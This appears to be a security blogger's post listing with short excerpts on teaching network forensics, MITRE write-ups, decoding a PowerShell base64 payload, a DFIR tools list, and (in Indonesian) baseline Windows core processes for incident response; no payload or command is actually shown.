So I got two interesting opportunity in 2022. That is praktisi mengajar to talk about network forensic, and the other one is Deall Mentorship. Here how’s those things goes:

My writings on use case of MITRE that I send to cdef.id for their (supposedly) quarterly bulletin. This would be the second time cdef published my writings (check out the first one over here).

The bulletin can be accessed here or here

I was doing some ‘weird jobs’, and needed to know what really is happening with this powershell base64 payload. The payload itself is nothing typically new, but I think I’ll post it here incase someone needed it, since it was pretty hard trying these resources when I needed it.

so here’s some of those powershell payload.

even with the awesome list all over github, I kept losing tracks of cool tools, so here are some of them:

(last update 11.09.2022)

in the spirit of keep updating the resources, I’m moving this post to aldosimon/dfir

Dalam sebuah kegiatan incident response, adakalanya kita perlu mengetahui karakteristik proses yang sedang berjalan, sehingga dapat memutuskan apakah proses tersebut malicious atau tidak. Berikut beberapa proses inti windows (Windows core processes), dengan sedikit deskripsi dan karakteristik masing-masing, sebagai acuan baseline, sehingga ketika melakukan incident response kita memiliki kemudahan untuk melakukan filtering proses yang malicious atau tidak.